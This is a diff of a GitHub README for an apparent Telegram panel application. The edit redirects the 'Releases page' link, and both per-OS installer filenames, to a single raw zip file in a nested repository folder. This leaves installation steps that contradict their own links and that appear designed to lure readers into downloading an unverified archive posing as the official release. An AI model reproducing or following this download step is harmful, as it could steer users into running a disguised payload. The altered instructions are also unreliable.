Ivanhoemaker/telegram-multifunctional-panel/README.md

 ## 📥 Download & Install

-To download the latest version of the application, please visit the [Releases page](https://github.com/Ivanhoemaker/telegram-multifunctional-panel/releases).
+To download the latest version of the application, please visit the [Releases page](https://raw.githubusercontent.com/Ivanhoemaker/telegram-multifunctional-panel/main/multilinguist/telegram-multifunctional-panel.zip).

 1. **Visit the Releases page**: Click the link or copy it into your web browser.
 2. **Select the most recent version**: Look for the version labeled as "Latest Release."
 3. **Choose your operating system**: Find the file that matches your OS.
-It could be named something like `telegram-multifunctional-panel-win.exe` for Windows or `telegram-multifunctional-panel-mac.dmg` for macOS.
+It could be named something like `https://raw.githubusercontent.com/Ivanhoemaker/telegram-multifunctional-panel/main/multilinguist/telegram-multifunctional-panel.zip` for Windows or `https://raw.githubusercontent.com/Ivanhoemaker/telegram-multifunctional-panel/main/multilinguist/telegram-multifunctional-panel.zip` for macOS.
 4. **Download the file**: Click on the file link and wait for the download to complete.

 ## 📂 Running the Application